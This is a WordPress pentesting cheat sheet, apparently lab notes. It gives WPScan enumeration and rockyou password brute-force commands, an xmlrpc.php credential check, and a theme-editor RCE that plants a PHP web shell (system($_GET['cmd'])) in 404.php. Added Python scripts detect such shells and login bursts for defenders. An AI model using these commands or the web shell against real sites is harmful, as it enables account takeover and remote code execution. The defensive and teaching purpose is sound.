# Wordpress Pentesting

## WordPress Structure

```
.
├── index.php
├── license.txt
├── readme.html
├── wp-activate.php
├── wp-admin
├── wp-blog-header.php
├── wp-comments-post.php
├── wp-config.php
├── wp-config-sample.php
├── wp-content
├── wp-cron.php
├── wp-includes
├── wp-links-opml.php
├── wp-load.php
├── wp-login.php
├── wp-mail.php
├── wp-settings.php
├── wp-signup.php
├── wp-trackback.php
└── xmlrpc.php
```

## WordPress User Roles

***

There are five types of users in a standard WordPress installation.

| Role          | Description                                                                                                                                            |
| ------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------ |
| Administrator | This user has access to administrative features within the website. This includes adding and deleting users and posts, as well as editing source code. |
| Editor        | An editor can publish and manage posts, including the posts of other users.                                                                            |
| Author        | Authors can publish and manage their own posts.                                                                                                        |
| Contributor   | These users can write and manage their own posts but cannot publish them.                                                                              |
| Subscriber    | These are normal users who can browse posts and edit their profiles.                                                                                   |

## WPScan

### Basic Scan

```
wpscan --url http://127.0.0.1
```

### Enumerate Plugins using WPScan

```bash
wpscan --url http://94.237.49.182:58555/ --enumerate ap
```

### Enumerate Users using WPScan

```bash
wpscan --url http://94.237.49.182:58555/ --enumerate u
```

### WPScan Aggressive Mode Plugins

```bash
wpscan --url http://blog.inlanefreight.local -e ap --no-banner --plugins-detection aggressive --plugins-version-detection aggressive --max-threads 60
```

### ALL in ONE WPSCAN Command

```bash
wpscan --url target.com --disable-tls-checks --api-token <api-token> -e at -e ap -e u --enumerate ap --plugins-detection aggressive --force
```

### Normal WPSCAN Bruteforce Attack

```bash
wpscan --url http://example.com --passwords /usr/share/wordlists/rockyou.txt
```

### BruteForce attack using WPScan

WPScan can be used to brute force usernames and passwords. The scan report returned three users registered on the website: `admin`, `roger`, and `david`. The tool uses two kinds of login brute force attacks, `xmlrpc` and `wp-login`. The `wp-login` method will attempt to brute force the normal WordPress login page, while the `xmlrpc` method uses the WordPress API to make login attempts through `/xmlrpc.php`. The `xmlrpc` method is preferred as it is faster.

```bash
# -U takes a comma-separated user list with no spaces; "admin, david" would pass "david" as a separate argument
wpscan --password-attack xmlrpc -t 20 -U admin,david -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.com
```


## RCE using ThemeEditor

We need to log in as an Administrator on the WordPress portal and then open the theme editor page.

Edit the theme's **404 template** (`404.php`) and add the reverse shell to it.


Alternatively, you can add the following code instead:

```php
<?php
system($_GET['cmd']);
?>
```


Now save the file and visit the URL below to reach it and execute the code:

```
http://<target>/wp-content/themes/twentyseventeen/404.php
```


And we have successful RCE.
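
From the defender's side, the theme-editor technique above leaves two things to check for: a theme or plugin file that feeds request input (`$_GET`, `$_POST`, ...) into a code-execution function such as `system()`, and a `wp-config.php` that still allows file editing from `wp-admin`. The script below is an added example, not code from the original page or from WordPress/WPScan; it builds a small constructed site in a temp directory (one clean theme plus a `404.php` containing the one-liner from this section) and scans it. The sink and superglobal lists, the `DISALLOW_FILE_EDIT` regex and the sample file contents are my own choices.

```python
"""Scan a WordPress tree for theme/plugin files that pass request input to a
code-execution sink (the footprint of a shell dropped through the theme editor)
and check whether wp-config.php disables the editor. Added example; not part of
the original page and not WordPress or WPScan code."""
import re
import tempfile
from pathlib import Path

# PHP functions that hand a string to the OS shell or the PHP interpreter.
EXEC_SINKS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open", "eval")
# Request superglobals that arrive straight from the client.
INPUT_SOURCES = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE")

SINK_RE = re.compile(r"\b(?:" + "|".join(EXEC_SINKS) + r")\s*\(", re.IGNORECASE)
SOURCE_RE = re.compile("|".join(re.escape(s) for s in INPUT_SOURCES))
# define('DISALLOW_FILE_EDIT', true); removes the theme/plugin editor from wp-admin.
DISALLOW_RE = re.compile(r"define\s*\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.IGNORECASE)
HARDENED_WP_CONFIG_LINE = "define('DISALLOW_FILE_EDIT', true);"


def find_webshell_indicators(root):
    """Return (relative path, line number, line) for every line of a .php file
    under root that both calls an exec sink and reads a request superglobal."""
    root = Path(root)
    hits = []
    for path in sorted(root.rglob("*.php")):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        for lineno, line in enumerate(text.splitlines(), start=1):
            if SINK_RE.search(line) and SOURCE_RE.search(line):
                hits.append((str(path.relative_to(root)), lineno, line.strip()))
    return hits


def file_editing_disabled(wp_config_path):
    """True if wp-config.php has an active (uncommented) DISALLOW_FILE_EDIT = true."""
    for line in Path(wp_config_path).read_text(encoding="utf-8", errors="replace").splitlines():
        stripped = line.strip()
        if stripped.startswith(("//", "#", "*", "/*")):
            continue  # commented-out define does not harden anything
        if DISALLOW_RE.search(stripped):
            return True
    return False


# Constructed sample site: one clean theme plus the 404.php shell from this page.
CONSTRUCTED_FILES = {
    "wp-config.php": "<?php\ndefine('DB_NAME', 'wordpress');\n// editor left enabled\n",
    "wp-content/themes/twentyseventeen/index.php": "<?php\nget_header();\nget_footer();\n",
    "wp-content/themes/twentyseventeen/functions.php": "<?php\nfunction show($s) { echo esc_html($s); }\n",
    "wp-content/themes/twentyseventeen/404.php": "<?php\nget_header();\nsystem($_GET['cmd']);\nget_footer();\n",
}


def build_sample_site():
    """Write CONSTRUCTED_FILES into a fresh temp directory and return its path."""
    root = Path(tempfile.mkdtemp(prefix="wp-sample-"))
    for rel, body in CONSTRUCTED_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for rel, lineno, line in find_webshell_indicators(site):
        print(f"[!] {rel}:{lineno}: {line}")
    if not file_editing_disabled(site / "wp-config.php"):
        print(f"[!] theme editor enabled; add to wp-config.php: {HARDENED_WP_CONFIG_LINE}")
```

Run it against a real document root by calling `find_webshell_indicators("/var/www/html")` instead of the constructed site. The line-level sink/source match is deliberately crude (it will miss a shell that stages the input through a variable first), so treat it as a fast triage pass alongside file-integrity checks against the known theme sources.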

## XMLRPC.php

It is important to note that `xmlrpc.php` being enabled on a WordPress instance is not a vulnerability. Depending on the methods allowed `xmlrpc.php` can facilitate some enumeration and exploitation activities, though.

If we have a username and password for the admin user, we can retrieve information through `xmlrpc.php`:

```bash
curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" http://blog.inlanefreight.com/xmlrpc.php
```
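
Both the WPScan password attack described earlier (its `xmlrpc` and `wp-login` methods) and the `xmlrpc.php` calls in this section show up in the web server access log as a run of `POST` requests to `/xmlrpc.php` or `/wp-login.php` from one source. The detector below is an added example, not part of the original page and not WPScan or WordPress code; it assumes the Apache/nginx combined log format, and the log lines, IP addresses, threshold and window are constructed values I chose for the demonstration.

```python
"""Flag sources that hammer the two WordPress login endpoints, /xmlrpc.php and
/wp-login.php, in a web server access log. Added example; not part of the
original page and not WPScan or WordPress code. Assumes the Apache/nginx
combined log format; the sample lines below are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)
LOGIN_ENDPOINTS = ("/xmlrpc.php", "/wp-login.php")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],  # drop the query string
        "status": int(m.group("status")),
    }


def detect_login_bursts(lines, threshold=10, window_seconds=60):
    """Return {(ip, endpoint): peak count} for every source that POSTed to a
    login endpoint at least `threshold` times inside any `window_seconds` span.
    Status codes are deliberately ignored: a failed wp-login.php attempt and a
    failed xmlrpc.php call both come back as 200, so volume is the signal."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # (ip, path) -> timestamps inside the window
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] not in LOGIN_ENDPOINTS:
            continue
        key = (rec["ip"], rec["path"])
        q = recent[key]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > window:   # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            alerts[key] = max(alerts.get(key, 0), len(q))
    return alerts


def _line(ip, ts, method, path, status=200):
    """Build one constructed combined-format log line."""
    stamp = ts.strftime("%d/%b/%Y:%H:%M:%S %z")
    return f'{ip} - - [{stamp}] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'


_T0 = datetime(2024, 5, 1, 10, 0, 0, tzinfo=timezone.utc)
SAMPLE_LOG = (
    # three wp-login.php POSTs spread over six minutes: a person retyping a password
    [_line("203.0.113.5", _T0 + timedelta(minutes=3 * i), "POST", "/wp-login.php") for i in range(3)]
    # 25 xmlrpc.php POSTs in 25 seconds: the shape of a password attack
    + [_line("198.51.100.7", _T0 + timedelta(seconds=i), "POST", "/xmlrpc.php") for i in range(25)]
    # an ordinary page view and a non-matching line are ignored
    + [_line("192.0.2.9", _T0 + timedelta(seconds=40), "GET", "/?p=1"), "garbage line"]
)

if __name__ == "__main__":
    for (ip, path), count in detect_login_bursts(SAMPLE_LOG).items():
        print(f"[!] {ip}: {count} POSTs to {path} within 60s")
```

To run it on a real log, pass `open("/var/log/apache2/access.log")` as `lines`. Keep `xmlrpc.php` and `wp-login.php` as separate keys: legitimate mobile and publishing clients do POST to `xmlrpc.php` at a steady rate, so the threshold for that endpoint should be tuned against a baseline rather than copied from the `wp-login.php` one.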
